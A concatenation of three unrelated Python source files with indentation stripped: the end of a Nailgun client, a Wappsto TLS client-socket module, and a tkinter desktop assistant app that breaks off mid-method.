# we do not start reading from stdin before server actually requests that
with conn.stdin_condition:
if conn.shutdown_event.is_set():
return
conn.stdin_condition.wait()
if conn.shutdown_event.is_set():
return
if not conn.stdin or eof:
conn._send_chunk("", CHUNKTYPE_STDIN_EOF)
continue
buf = conn.stdin.readline()
if buf == "":
eof = True
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
conn._send_chunk(buf, CHUNKTYPE_STDIN)
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def heartbeat_thread_main(conn):
"""
Heartbeat thread worker function
Periodically sends heartbeats to server as long as command is running
"""
try:
while True:
with conn.heartbeat_condition:
if conn.shutdown_event.is_set():
return
conn.heartbeat_condition.wait(conn.heartbeat_interval_sec)
if conn.shutdown_event.is_set():
return
conn._send_heartbeat()
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def make_nailgun_transport(nailgun_server, nailgun_port=None, cwd=None):
"""
Creates and returns a socket connection to the nailgun server.
"""
transport = None
if nailgun_server.startswith("local:"):
if platform.system() == "Windows":
pipe_addr = nailgun_server[6:]
transport = WindowsNamedPipeTransport(pipe_addr)
else:
try:
s = socket.socket(socket.AF_UNIX)
except socket.error as msg:
re_raise(
NailgunException(
"Could not create local socket connection to server: {0}".format(
msg
),
NailgunException.SOCKET_FAILED,
)
)
socket_addr = nailgun_server[6:]
prev_cwd = os.getcwd()
try:
if cwd is not None:
os.chdir(cwd)
s.connect(socket_addr)
transport = UnixTransport(s)
except socket.error as msg:
re_raise(
NailgunException(
"Could not connect to local server at {0}: {1}".format(
socket_addr, msg
),
NailgunException.CONNECT_FAILED,
)
)
finally:
if cwd is not None:
os.chdir(prev_cwd)
else:
socket_addr = nailgun_server
socket_family = socket.AF_UNSPEC
for (af, socktype, proto, _, sa) in socket.getaddrinfo(
nailgun_server, nailgun_port, socket.AF_UNSPEC, socket.SOCK_STREAM
):
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.connect(sa)
transport = UnixTransport(s)
except socket.error as msg:
s.close()
s = None
continue
break
if transport is None:
raise NailgunException(
"Could not connect to server {0}:{1}".format(nailgun_server, nailgun_port),
NailgunException.CONNECT_FAILED,
)
return transport
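# Usage sketch (illustrative values only; the two forms below mirror the branches above):
#   make_nailgun_transport("local:/tmp/nailgun.sock")        # unix domain socket / named pipe
#   make_nailgun_transport("127.0.0.1", nailgun_port=2113)   # TCP host and port resolved via getaddrinfo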
if is_py2:
exec(
'''
def re_raise(ex, ex_trace = None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
if ex_trace is None:
ex_trace = sys.exc_info()[2]
raise ex, None, ex_trace
'''
)
else:
def re_raise(ex, ex_trace=None):
"""
Throw ex; on Python 3 the original traceback is preserved automatically via exception chaining
"""
raise ex
def main():
"""
Main entry point to the nailgun client.
"""
default_nailgun_server = os.environ.get("NAILGUN_SERVER", "127.0.0.1")
default_nailgun_port = int(os.environ.get("NAILGUN_PORT", NAILGUN_PORT_DEFAULT))
parser = optparse.OptionParser(usage="%prog [options] cmd arg1 arg2 ...")
parser.add_option("--nailgun-server", default=default_nailgun_server)
parser.add_option("--nailgun-port", type="int", default=default_nailgun_port)
parser.add_option("--nailgun-filearg")
parser.add_option("--nailgun-showversion", action="store_true")
parser.add_option("--nailgun-help", action="help")
(options, args) = parser.parse_args()
if options.nailgun_showversion:
print("NailGun client version " + NAILGUN_VERSION)
if len(args):
cmd = args.pop(0)
else:
cmd = os.path.basename(sys.argv[0])
# Pass any remaining command line arguments to the server.
cmd_args = args
try:
with NailgunConnection(
options.nailgun_server, server_port=options.nailgun_port
) as c:
exit_code = c.send_command(cmd, cmd_args, options.nailgun_filearg)
sys.exit(exit_code)
except NailgunException as e:
sys.stderr.write(str(e))
sys.exit(e.code)
except KeyboardInterrupt as e:
pass
if __name__ == "__main__":
main()
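# Example invocation (a sketch; the script name, server address, port and command are
# illustrative, and the NAILGUN_SERVER / NAILGUN_PORT environment variables may supply defaults):
#   python <this_script>.py --nailgun-server 127.0.0.1 --nailgun-port 2113 some.Command arg1 arg2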
|
communication.py
|
"""
The server communication module.
Stores the server communication functionality for Wappsto as well as the
sending and receiving threads.
"""
import os
import socket
import threading
import time
import queue
import ssl
import logging
from . import message_data
from . import receive_data
from . import send_data
from .. import status
from ..errors import wappsto_errors
class ClientSocket:
"""
The ClientSocket class that manages the connection to the server.
Stores the sending and receiving threads, certificates as well as connection
information.
"""
def __init__(self, rpc, data_manager, address, port, path_to_calling_file,
wappsto_status, automatic_trace, event_storage):
"""
Create a client socket.
Creates a socket instance for the given address and port. Handles
transfer of data from the instance attributes and methods to the
specified server. Connection to the server is based on the specified
address and port.
Args:
rpc: Sending/receiving queue processing instance.
data_manager: instance of DataManager.
address: Server address.
port: Server port.
path_to_calling_file: path to OS directory of calling file.
wappsto_status: status object.
automatic_trace: indicates if all messages automatically send a trace.
event_storage: instance of event log.
"""
self.wapp_log = logging.getLogger(__name__)
self.wapp_log.addHandler(logging.NullHandler())
self.data_manager = data_manager
self.path_to_calling_file = path_to_calling_file
self.ssl_server_cert = os.path.join(path_to_calling_file,
"certificates/ca.crt")
self.ssl_client_cert = os.path.join(path_to_calling_file,
"certificates/client.crt")
self.ssl_key = os.path.join(path_to_calling_file,
"certificates/client.key")
self.address = address
self.port = port
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
self.ssl_context.verify_mode = ssl.CERT_REQUIRED
self.ssl_context.load_cert_chain(self.ssl_client_cert, self.ssl_key)
self.ssl_context.load_verify_locations(self.ssl_server_cert)
self.wappsto_status = wappsto_status
self.receive_data = receive_data.ReceiveData(self)
self.receiving_thread = threading.Thread(target=self.receive_data.receive_thread)
self.receiving_thread.setDaemon(True)
self.send_data = send_data.SendData(self, automatic_trace)
self.sending_thread = threading.Thread(target=self.send_data.send_thread)
self.sending_thread.setDaemon(True)
self.connected = False
self.sending_queue = queue.Queue(maxsize=0)
self.rpc = rpc
self.event_storage = event_storage
self.packet_awaiting_confirm = {}
self.lock_await = threading.Lock()
self.set_sockets()
self.data_manager.network.rpc = self.rpc
self.data_manager.network.conn = self
def set_sockets(self):
"""
Create socket to communicate with server.
Creates a socket instance and sets the options for communication.
Passes the socket to the ssl_wrap method
"""
self.my_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.my_raw_socket.setsockopt(
socket.SOL_SOCKET,
socket.SO_KEEPALIVE,
1
)
if (hasattr(socket, "TCP_KEEPIDLE")
and hasattr(socket, "TCP_KEEPINTVL")
and hasattr(socket, "TCP_KEEPCNT")):
# After 5 idle minutes, start sending keepalives every 1 minute.
# Drop the connection after 2 failed keepalives.
self.my_raw_socket.setsockopt(
socket.IPPROTO_TCP,
socket.TCP_KEEPIDLE,
5 * 60
)
self.my_raw_socket.setsockopt(
socket.IPPROTO_TCP,
socket.TCP_KEEPINTVL,
60
)
self.my_raw_socket.setsockopt(
socket.IPPROTO_TCP,
socket.TCP_KEEPCNT,
2
)
# self.my_raw_socket.setsockopt(
# socket.IPPROTO_TCP,
# socket.TCP_USER_TIMEOUT,
# 30000
# )
self.my_socket = self.ssl_wrap()
def ssl_wrap(self):
"""
Wrap socket.
Wraps the socket using the SSL context configured for the client,
passing the server address as the server hostname (used for SNI).
Returns:
An SSL wrapped socket.
"""
return self.ssl_context.wrap_socket(
self.my_raw_socket,
server_hostname=self.address
)
def connect(self):
"""
Connect to the server.
Attempts a connection to the server on the provided address and port.
Returns:
A connection flag to denote if the connection was successful or
not.
"""
self.connected = False
try:
self.my_socket.settimeout(10)
self.my_socket.connect((self.address, self.port))
self.connected = True
self.my_socket.settimeout(None)
self.wappsto_status.set_status(status.CONNECTED)
self.send_logged_data()
return True
except Exception as e:
self.wapp_log.error("Failed to connect: {}".format(e))
return False
def send_logged_data(self):
"""
Send logged data.
Starts a thread that sends all of the logged data.
"""
processThread = threading.Thread(target=self.event_storage.send_log, args=(self,))
processThread.start()
def initialize_all(self):
"""
Initialize the network on the server.
Requests the current control states and adds the whole encoded network
to the sending queue, then waits for the confirmations.
"""
for device in self.data_manager.network.devices:
for value in device.values:
state = value.get_control_state()
if state is not None:
msg = message_data.MessageData(
message_data.SEND_CONTROL,
network_id=state.parent.parent.parent.uuid,
device_id=state.parent.parent.uuid,
value_id=state.parent.uuid,
state_id=state.uuid,
verb=message_data.GET
)
self.send_data.send_control(msg)
trace_id = self.send_data.create_trace(self.data_manager.network.uuid)
message = self.rpc.get_rpc_whole_json(self.data_manager.get_encoded_network(), trace_id)
self.send_data.create_bulk(message)
msg = "The whole network {} added to Sending queue {}.".format(
self.data_manager.network.name,
self.rpc
)
self.wapp_log.debug(msg)
self.confirm_initialize_all()
def add_id_to_confirm_list(self, data):
"""
Add the message ID to the confirm list.
Adds the ID of the decoded JSON message to the list of packets
awaiting confirmation. Uses locks to ensure atomicity.
Args:
data: JSON communication message data.
"""
self.lock_await.acquire()
self.packet_awaiting_confirm[data.get('id')] = data
self.lock_await.release()
def remove_id_from_confirm_list(self, _id):
"""
Remove the ID from the confirm list.
Removes the ID of the decoded JSON message from the list of packets
awaiting confirmation. Uses locks to ensure atomicity.
Args:
_id: ID to remove from the confirm list.
"""
self.lock_await.acquire()
if _id in self.packet_awaiting_confirm:
del self.packet_awaiting_confirm[_id]
self.lock_await.release()
def reconnect(self, retry_limit=None, send_reconnect=True):
"""
Attempt to reconnect.
Attempts to reconnect when the connection has been interrupted.
"""
self.wappsto_status.set_status(status.RECONNECTING)
self.connected = False
attempt = 0
while not self.connected and (retry_limit is None
or retry_limit > attempt):
attempt += 1
self.wapp_log.info("Trying to reconnect in 5 seconds")
time.sleep(5)
self.close()
self.set_sockets()
self.connect()
if self.connected is True:
self.wapp_log.info("Reconnected with " + str(attempt) + " attempts")
if send_reconnect:
reconnect = message_data.MessageData(message_data.SEND_RECONNECT)
self.sending_queue.put(reconnect)
else:
msg = ("Unable to connect to the server[IP: {}, Port: {}]"
.format(self.address, self.port)
)
raise wappsto_errors.ServerConnectionException(msg)
def get_object_without_none_values(self, encoded_object):
"""
Remove None values from an object.
Recursively removes any keys whose value is None, together with nested
dictionaries and list elements that become empty as a result.
Args:
encoded_object: dictionary object.
"""
for key, val in list(encoded_object.items()):
if val is None:
del encoded_object[key]
elif isinstance(val, dict):
self.get_object_without_none_values(val)
if len(val) == 0:
del encoded_object[key]
elif isinstance(val, list):
for val_element in val:
self.get_object_without_none_values(val_element)
if len(val_element) == 0:
val.remove(val_element)
if len(val) == 0:
del encoded_object[key]
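# Example of the pruning behaviour (a sketch):
#   {"a": None, "b": {"c": None}, "d": [{"e": None}]}  is reduced in place to  {}
# because every nested value is None and the emptied containers are removed as well.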
def close(self):
"""
Close the connection.
Closes the socket object connection.
"""
self.wapp_log.info("Closing connection...")
for device in self.data_manager.network.devices:
for value in device.values:
if value.timer.is_alive():
msg = "Value: {} is no longer periodically sending updates.".format(value.uuid)
self.wapp_log.debug(msg)
value.timer.cancel()
self.connected = False
if self.my_socket:
self.my_socket.close()
self.my_socket = None
if self.my_raw_socket:
self.my_raw_socket.close()
self.my_raw_socket = None
def confirm_initialize_all(self):
"""
Confirm that all responses are received.
Keeps receiving messages until every packet awaiting confirmation has
been acknowledged.
"""
while len(self.packet_awaiting_confirm) > 0:
self.receive_data.receive_message()
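# Minimal usage sketch (assumes rpc, data_manager, wappsto_status and event_storage objects
# already exist elsewhere; the address, port and path are illustrative):
#   conn = ClientSocket(rpc, data_manager, "collector.wappsto.com", 443,
#                       path_to_calling_file, wappsto_status,
#                       automatic_trace=False, event_storage=event_storage)
#   if conn.connect():
#       conn.initialize_all()
#       conn.receiving_thread.start()
#       conn.sending_thread.start()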
|
main.py
|
# import required libraries
from tkinter import ttk
from pycricbuzz import Cricbuzz
from win10toast import ToastNotifier
from tkinter.messagebox import *
from tkinter.filedialog import *
import json
import pytesseract
import os
from mutagen.mp3 import MP3
import threading
from PIL import Image,ImageTk
import random
import wikipedia
import webbrowser
import cv2
from difflib import get_close_matches
from translate import Translator
from time import strftime,sleep
from datetime import *
import textwrap
from bbcnews import getweather,NewsFromBBC,searchbooks # get news methods from bbcnews.py
import backend #get bookstore backend
from google_images_download import google_images_download
from jarvis import * #get voice assistant methods from jarvis.py
from pygame import mixer
# class for root window
class Window(object):
def __init__(self,root):
# Defining root properties
self.root=root
self.root.title('R.A.SSISTANT')
self.root.geometry("540x640+500+5")
self.root.resizable(False, False)
self.style = ttk.Style()
self.style.theme_use('alt')
self.tabControl = ttk.Notebook(self.root)
self.tabControl.bind('<Button-1>', self.onclick)
self.tabControl.pack(expand=1, fill="both")
# onclick method for tabs
def onclick(self,event):
clicked_tab = self.tabControl.tk.call(self.tabControl._w, "identify", "tab", event.x, event.y)
active_tab = self.tabControl.index(self.tabControl.select())
if clicked_tab == 4:
if active_tab != 4:
t=threading.Thread(target=self.mythread)
t.start()
def mythread(self):
try:
voiceassistant.wishMe()
speak("Jarvis here. Please tell me how may I help you")
except:
print("error")
# homepage class
class Homepage:
def __init__(self,tabControl):
# add tab
self.tab1=ttk.Frame(tabControl)
tabControl.add(self.tab1,text="Home")
self.mynotifier=Label(self.tab1)
self.c = Cricbuzz()
self.matches = self.c.matches()
self.n=ToastNotifier()
# create a new frame and pack widgets in it
self.row1 = Frame(self.tab1, bg="lightyellow")
#label for displaying clock
self.clocklbl = Label(self.row1, font=('calibri', 15, 'bold'), fg="blue", bg="lightgreen")
# weather image
self.weatherimg = Image.open("images/weatherimg.jpeg")
# get height and width of image
wd, ht = self.weatherimg.size
# resize image
self.weatherimg = self.weatherimg.resize((wd // 4, ht // 4))
# convert to tkinter image
self.render = ImageTk.PhotoImage(self.weatherimg)
# label to display image
self.weatherimglbl = Label(self.row1, image=self.render)
# set image to label
self.weatherimglbl.image = self.render
# Get weather of a city entered by user
self.lblweather = Label(self.row1, text="Today's Weather", font=('calibri', 20, 'bold'))
self.myweathervar = StringVar()
# Label to display weather of my city
self.myweather = Label(self.row1, textvariable=self.myweathervar, bg='lightgray', font=('times', 11, 'bold'))
# calling getweather method defined in bbcnews
self.cityweather = getweather("nagpur")
# set weather details
self.myweathervar.set(self.cityweather)
# get weather of any city in the world
self.getcityweatherlbl = Label(self.row1, text="Get Weather for city :", font=('times', 15, 'bold'))
self.cityvar = StringVar()
# entry to accept cityname as input
self.cityvarentry = Entry(self.row1, textvariable=self.cityvar, font=('times', 15))
self.showvar = StringVar()
# label to display weather info
self.showweatherlbl = Label(self.row1, textvariable=self.showvar, bg='lightpink', font=('times', 10, 'bold'))
# creating new frame to display news headlines
self.row7 = Frame(self.tab1)
self.newslbl = Label(self.row7, text="Headlines for Today:",bg="lightgreen", font=('times', 15, 'bold'))
self.newstext = Label(self.row7, bg="lightyellow", font=('times', 12), wraplength=530, justify="left")
self.mytt = threading.Thread(target=self.mynotify)
self.mytt.daemon=True
self.mytt.start()
# define properties of widgets
def set(self):
self.cityvarentry.config(bd=5)
self.cityvarentry.bind("<Return>", self.getcityweather)
self.getnews()
# get news
def getnews(self):
self.results = NewsFromBBC()
i = 0
for ar in self.results:
ss = str(i + 1) + ". " + ar["title"] + "\n"
ss = self.newstext.cget("text") + ss
self.newstext.config(text=ss)
i += 1
# getcityweather
def getcityweather(self,event):
if self.cityvar.get() == "":
self.cityvar.set("")
showerror("Error", "City Not Found \n"
"Please enter valid city name")
else:
if getweather(self.cityvar.get()) == "N":
self.cityvar.set("")
showerror("Error", "City Not Found \n"
"Please enter valid city name")
else:
self.showweatherlbl.grid(row=1, column=2, pady="10")
self.showvar.set(getweather(self.cityvar.get()))
self.cityvarentry.delete(0, END)
# method to update time in clock label
def gettime(self):
string = strftime('%H:%M:%S %p')
self.clocklbl.config(text=string + " " + str(datetime.now().date()))
self.clocklbl.after(1000, self.gettime)
def mynotify(self):
self.f=0
flag=0
while self.f==0:
for match in self.matches:
if (match['mchstate'] == 'inprogress'):
live = self.c.livescore(match['id'])
mymatch = match['team1']['name'] + ' Vs ' + match['team2']['name'] + "\n" + 'Batting ' + \
live['batting']['team'] + "\n" + \
live['batting']['score'][0]['runs'] + '/' + live['batting']['score'][0]['wickets'] + ' ' + \
live['batting']['score'][0]['overs'] + ' overs' + "\n" + \
live['batting']['batsman'][0]['name'] + ' ' + live['batting']['batsman'][0]['runs'] + '(' + \
live['batting']['batsman'][0]['balls'] + ')*'
if len(live['batting']['batsman']) > 1:
mymatch += " " + live['batting']['batsman'][1]['name'] + ' ' + live['batting']['batsman'][1][
'runs'] + '(' + live['batting']['batsman'][1]['balls'] + ')*'
self.n.show_toast("Live Cricket",mymatch, duration=10)
flag=1
break
if flag==1:
for i in range(1,100000000):
if self.f==1:
break
else:
break
# packing widgets to window
def packwidgets(self):
self.row1.pack(fill="both")
self.gettime()
self.clocklbl.grid(row=0, column=2, padx="10")
self.weatherimglbl.grid(row=0, column=0)
self.lblweather.grid(row=0, column=1)
self.myweather.grid(row=1, column=0, columnspan=2, pady="10")
self.getcityweatherlbl.grid(row=2, column=0, columnspan=3, padx="20", sticky=N)
self.cityvarentry.grid(row=3, column=0, columnspan=3, padx="20", pady="10", sticky=N)
self.row7.pack(fill="both")
self.newstext.grid(row=1, column=0, sticky=W, pady="10")
self.newslbl.grid(row=0, column=0, pady="10", sticky=W)
# dictionary class
class Dictionary:
def __init__(self,tabControl):
# add tab
self.tab2 = ttk.Frame(tabControl)
tabControl.add(self.tab2, text="Dictionary")
# creating new frame
self.row2 = Frame(self.tab2)
self.data = json.load(open("data.json"))
self.lbl1 = Label(self.tab2, text='Enter a word to search')
# entry for accepting a word to search
self.display = StringVar()
self.dictentry = Entry(self.tab2, textvariable=self.display)
# text Widget to display meanings of words
self.meaning = Text(self.row2, bg="lightyellow")
self.meaning.bind("<Double-Button-1>", self.copy_text_to_clipboard)
#search button
self.search = Button(self.tab2, text="SEARCH", command=self.Search)
# label
self.lbl2 = Label(self.tab2, text="* - Double click on meaning text box to copy text to clipboard")
# set properties of widgets
def set(self):
self.lbl1.config(font=('times', 20, 'bold'), pady="10")
self.dictentry.config(font=('times', 15), bd=10)
self.meaning.tag_configure("center", justify='center')
self.meaning.tag_add("center", 1.0, "end")
self.search.config(width=20,bg="lightgreen", pady="10")
self.lbl2.config(font=('courier', 8, 'bold'), bg="lightblue")
# a dialog msg asking for confirmation
def dialogmsg(self,w):
if askyesno('Verify', w):
return "Y"
else:
return "N"
# copy text to clipboard on double click on text widget of dictionary
def copy_text_to_clipboard(self,event):
field_value = event.widget.get("1.0", 'end-1c') # get field value from event, but remove line return at end
root.clipboard_clear() # clear clipboard contents
root.clipboard_append(field_value) # append new value to clipboard
# clear dictionary entry
def clear_search(self):
self.dictentry.delete(0, END)
# get meaning of word
def translate(self,w):
# convert to lower case
w = w.lower()
# clear entry widget
self.clear_search()
# check for different cases
if w in self.data:
return self.data[w]
elif w.title() in self.data:
return self.data[w.title()]
elif w.upper() in self.data: # in case user enters words like USA or NATO
return self.data[w.upper()]
elif len(get_close_matches(w, self.data.keys())) > 0:
ans = self.dialogmsg("Did you mean %s instead?" % get_close_matches(w, self.data.keys())[0])
if ans == "Y":
return self.data[get_close_matches(w, self.data.keys())[0]]
elif ans == "N":
return "The word doesn't exist. Please double check it."
else:
return "We didn't understand your entry."
else:
return "The word doesn't exist. Please double check it."
# checking for errors or wrong info and add meaning to text widget
def Search(self):
if self.display.get() != "" and self.display.get() is not None:
ss = self.display.get()
i = 1
output = self.translate(ss)
if not ("The word doesn't exist" in output or "We didn't understand your entry." in output):
self.meaning.insert(END, "MEANING -\n")
if type(output) == list:
for item in output:
# add meaning to text widget
self.meaning.insert(END, str(i) + ". " + item + "\n\n")
i += 1
else:
self.meaning.insert(END, output + "\n\n")
# pack widgets on screen
def packwidgets(self):
self.lbl1.pack()
self.dictentry.pack()
self.row2.pack(fill=X,padx="10")
self.meaning.pack(pady=10)
self.search.pack()
self.lbl2.pack(pady=10)
class TranslateText:
def __init__(self,tabControl):
# add tab
self.tab3 = ttk.Frame(tabControl)
tabControl.add(self.tab3, text="Translate")
# label for prompting user to enter a sentence or a word to translate
self.lbl3 = Label(self.tab3, text='Enter Something in English to Translate')
# entry to accept user input
self.mysentence = StringVar()
self.sentence = Entry(self.tab3, textvariable=self.mysentence)
# select language to translate into from the listbox
self.lbl4 = Label(self.tab3, text='Select a language -')
self.Lb = Listbox(self.tab3)
self.languages = ['german', 'hindi', 'spanish', 'italian', 'chinese', 'japanese', 'french']
# Label to display the translated text
self.ttxt = StringVar()
self.translatedtext = Label(self.tab3, bg="lightgreen", textvariable=self.ttxt, wraplength=500)
# creating new Frame to add buttons in it
self.row3 = Frame(self.tab3)
# button to enable translation
self.GO = Button(self.row3, text="GO", command=self.go)
# button to clear all input and results from previous search
self.CLEAR = Button(self.row3, text="CLEAR", command=self.clear_text)
# set properties and perform basic operations on widgets
def set(self):
self.lbl3.config(font=('times', 20, 'bold'), pady="20")
self.sentence.config(font=('times', 20), bd=10, width=40)
self.lbl4.config(font=('times', 20, 'bold'), pady="20")
k = 1
for ll in self.languages:
self.Lb.insert(k, ll)
k += 1
self.translatedtext.config(font=('times', 20, 'bold'), width=30)
self.GO.config(width=10, height=2, bg="lightgreen")
self.row3.columnconfigure(0, weight=1)
self.row3.columnconfigure(1, weight=1)
self.CLEAR.config(width=10, height=2, bg="lightblue")
# clear data in widgets of translate tab
def clear_text(self):
self.sentence.delete(0, END)
self.Lb.select_clear(ACTIVE)
self.ttxt.set("")
# method to translate a word or a sentence into selected language
def go(self):
# check if input is not empty
if self.mysentence.get() != None and self.mysentence.get() != "":
lang = str(self.Lb.get(ACTIVE))
if lang != "" or lang != None:
# translator module to translate the text
translator = Translator(to_lang=lang)
translation = translator.translate(self.mysentence.get())
# set translated text to label
self.ttxt.set(lang + " - " + translation + "\n")
# pack label to screen
self.translatedtext.pack(pady=10)
else:
# no language selected from the list
self.ttxt.set("please select a valid language from the list\n")
else:
# invalid input
showwarning("invalid input", "Enter a valid sentence")
# pack widgets to screen
def packwidgets(self):
self.lbl3.pack()
self.sentence.pack()
self.lbl4.pack()
self.Lb.pack()
self.row3.pack(fill=X)
self.GO.grid(row=0, column=0, padx=10, pady=20, sticky=E)
self.CLEAR.grid(row=0, column=1, pady=20, sticky=W)
#Bookstore class
class BookStore:
def __init__(self,tabControl):
# add tab
self.tab4 = ttk.Frame(tabControl)
tabControl.add(self.tab4, text="BookStore")
# creating new frame to add widgets
self.row4 = Frame(self.tab4)
# label for book info
self.l1 = Label(self.row4, text="Title")
self.l2 = Label(self.row4, text="Author")
self.l3 = Label(self.row4, text="Year")
self.l4 = Label(self.row4, text="ISBN")
# entries for accepting bookinfo as input
self.title_text = StringVar()
self.e1 = Entry(self.row4, textvariable=self.title_text)
self.author_text = StringVar()
self.e2 = Entry(self.row4, textvariable=self.author_text)
self.year_text = StringVar()
self.e3 = Entry(self.row4, textvariable=self.year_text)
self.isbn_text = StringVar()
self.e4 = Entry(self.row4, textvariable=self.isbn_text)
#listbox to show entries in the database
self.list1 = Listbox(self.row4, height=10, width=40)
# adding scrollbar to listbox
self.sb1 = Scrollbar(self.row4)
# buttons for different operations
self.b1 = Button(self.row4, text="View all", width=12,bg="lightgreen", command=self.view_command)
self.b2 = Button(self.row4, text="Search entry", width=12,bg="lightblue", command=self.search_command)
self.b3 = Button(self.row4, text="Add entry", width=12,bg="lightgreen", command=self.add_command)
self.b4 = Button(self.row4, text="Update selected", width=12,bg="lightblue", command=self.update_command)
self.b5 = Button(self.row4, text="Delete selected", width=12,bg="lightgreen", command=self.delete_command)
# creating another frame for add online book search functionality
self.row5 = Frame(self.tab4)
self.searchbooklbl = Label(self.row5, text="Search a book online :", font=('times', 15, 'bold'))
self.bookentrytext = StringVar()
self.searchbookentry = Entry(self.row5, textvariable=self.bookentrytext, bd=5, font=('times', 15))
# frame for adding search results label
self.row6 = Frame(self.tab4)
self.volumeinfo = Label(self.row6, font=('times', 15), justify="left", bg="lightblue")
self.searchbookentry.bind("<Return>", self.bookinfo)
# get bookinfo from google api
def bookinfo(self,event):
# get bookname entered by user
ss = self.bookentrytext.get()
try:
if ss != "":
ss = ss.replace(" ", "")
# calling the searchbooks method from bbcnews.py
book = searchbooks(ss)
# get required info from dictionary object book
book_title = book["volumeInfo"]["title"]
book_authors = book["volumeInfo"]["authors"]
# if pageCount is present in bookinfo
if "pageCount" in book["volumeInfo"].keys():
pagecount = str(book["volumeInfo"]["pageCount"])
else:
pagecount = "unknown"
book_lang = book["volumeInfo"]["language"]
published_date = book["volumeInfo"]["publishedDate"]
isbn = book["volumeInfo"]["industryIdentifiers"][1]["identifier"]
summary = textwrap.fill(book["searchInfo"]["textSnippet"], width=65)
# display bookinfo in label
self.volumeinfo.config(text="\nTitle: " + book_title + "\nAuthor(s): " + ",".join(
book_authors) + "\nPublished-Date: " + published_date + "\nISBN: " + isbn
+ "\nPage count: " + pagecount + "\nLanguage: " + book_lang + "\nSummary:\n" + summary)
self.volumeinfo.grid(row=1, sticky=W)
#clear book entry
self.bookentrytext.set("")
else:
# book not found
showerror("message", "please enter a valid book")
except:
# book not found
showerror("message", "book not found ,maybe try providing author name or isbn")
# get the selected item from the listbox
def get_selected_row(self,event):
try:
global selected_tuple
index = self.list1.curselection()[0]
selected_tuple = self.list1.get(index)
# automatically put the details in the entries of frame row4
self.e1.delete(0, END)
# set title
self.e1.insert(END, selected_tuple[1])
self.e2.delete(0, END)
# set author
self.e2.insert(END, selected_tuple[2])
self.e3.delete(0, END)
# set year
self.e3.insert(END, selected_tuple[3])
self.e4.delete(0, END)
# set isbn
self.e4.insert(END, selected_tuple[4])
except IndexError:
pass
# view contents of bookstore database
def view_command(self):
self.list1.delete(0, END)
for row in backend.view():
self.list1.insert(END, row)
# search for a book in database
def search_command(self):
self.list1.delete(0, END)
for row in backend.search(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.isbn_text.get()):
self.list1.insert(END, row)
# add a book into database
def add_command(self):
if self.title_text.get()!="" and self.author_text.get()!="" and self.year_text.get()!="" and self.isbn_text.get()!="":
backend.insert(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.isbn_text.get())
self.list1.delete(0, END)
self.list1.insert(END, (self.title_text.get(), self.author_text.get(), self.year_text.get(), self.isbn_text.get()))
else:
showerror("Error","please provide all the required info of book")
# delete entry from database
def delete_command(self):
try:
backend.delete(selected_tuple[0])
except:
showerror("Error","no item to delete or select an item first")
# update details of a book
def update_command(self):
try:
backend.update(selected_tuple[0], self.title_text.get(), self.author_text.get(), self.year_text.get(), self.isbn_text.get())
except:
showerror("Error","Nothing to update")
# pack widgets on screen
def packwidgets(self):
self.row4.pack(side="top")
self.l1.grid(row=0, column=0, padx="20", pady="10")
self.l2.grid(row=0, column=2, padx="20", pady="10")
self.l3.grid(row=1, column=0, padx="20", pady="10")
self.l4.grid(row=1, column=2, padx="20", pady="10")
self.e1.grid(row=0, column=1, padx="20", pady="10")
self.e2.grid(row=0, column=3, padx="20", pady="10")
self.e3.grid(row=1, column=1, padx="20", pady="10")
self.e4.grid(row=1, column=3, padx="20", pady="10")
self.list1.grid(row=2, column=0, rowspan=10, columnspan=2, padx="20")
self.sb1.grid(row=2, column=2, rowspan=10)
self.list1.configure(yscrollcommand=self.sb1.set)
self.sb1.configure(command=self.list1.yview)
self.list1.bind('<<ListboxSelect>>', self.get_selected_row)
self.b1.grid(row=2, column=3, pady="5")
self.b2.grid(row=3, column=3, pady="5")
self.b3.grid(row=4, column=3, pady="5")
self.b4.grid(row=5, column=3, pady="5")
self.b5.grid(row=6, column=3, pady="5")
self.row5.pack(pady="20")
self.searchbooklbl.grid(row=0, column=0, sticky=N, padx="10")
self.searchbookentry.grid(row=0, column=1, sticky=N)
self.row6.pack()
# voice assistant class
class VoiceAssistant:
def __init__(self,tabControl):
# add tab
self.tab5 = ttk.Frame(tabControl)
tabControl.add(self.tab5, text="Voice Assistant")
# creating a new Frame to add widgets
self.row7 = Frame(self.tab5)
self.label1 = ttk.Label(self.row7, text='Query:')
# get search query from user as input
self.entry1 = ttk.Entry(self.row7, width=40)
self.radiobtn = StringVar()
self.entry1.bind('<Return>', self.get)
self.photo = PhotoImage(file='images/microphone.png').subsample(30,30)
#Mic button
self.MyButton6 = Button(self.row7, image=self.photo, command=self.listenvoice, bd=0, activebackground='#c1bfbf',
overrelief='groove', relief='sunken')
# search button
self.MyButton1 = ttk.Button(self.row7, text='Search', width=10, command=self.callback)
# add radio buttons in new frame
self.row8 = Frame(self.tab5)
# radio buttons
self.MyButton2 = ttk.Radiobutton(self.row8, text='Google', value='google', variable=self.radiobtn)
self.MyButton3 = ttk.Radiobutton(self.row8, text='Duck', value='duck', variable=self.radiobtn)
self.MyButton4 = ttk.Radiobutton(self.row8, text='Amazon-Books', value='amz', variable=self.radiobtn)
self.MyButton5 = ttk.Radiobutton(self.row8, text='Youtube', value='ytb', variable=self.radiobtn)
# frame to display info returned
self.row9 = Frame(self.tab5)
self.mylabel = Label(self.row9, text="* say jarvis before asking a question through voice", bg="lightblue",
font=('courier', 10, 'bold'), wraplength=500)
self.jarvistext = Text(self.row9, font=('courier', 15, 'bold'), bg="lightyellow")
# set focus on entry widget
self.entry1.focus()
# set google radiobutton selected by default
self.radiobtn.set('google')
# method to greet me on tab click
def wishMe(self):
hour = int(datetime.now().hour)
if hour >= 0 and hour < 12:
speak("Good Morning sir!")
elif hour >= 12 and hour < 18:
speak("Good Afternoon sir!")
else:
speak("Good Evening sir!")
# callback method for search query provided in assistant tab and search for the query on selected search engine
def callback(self):
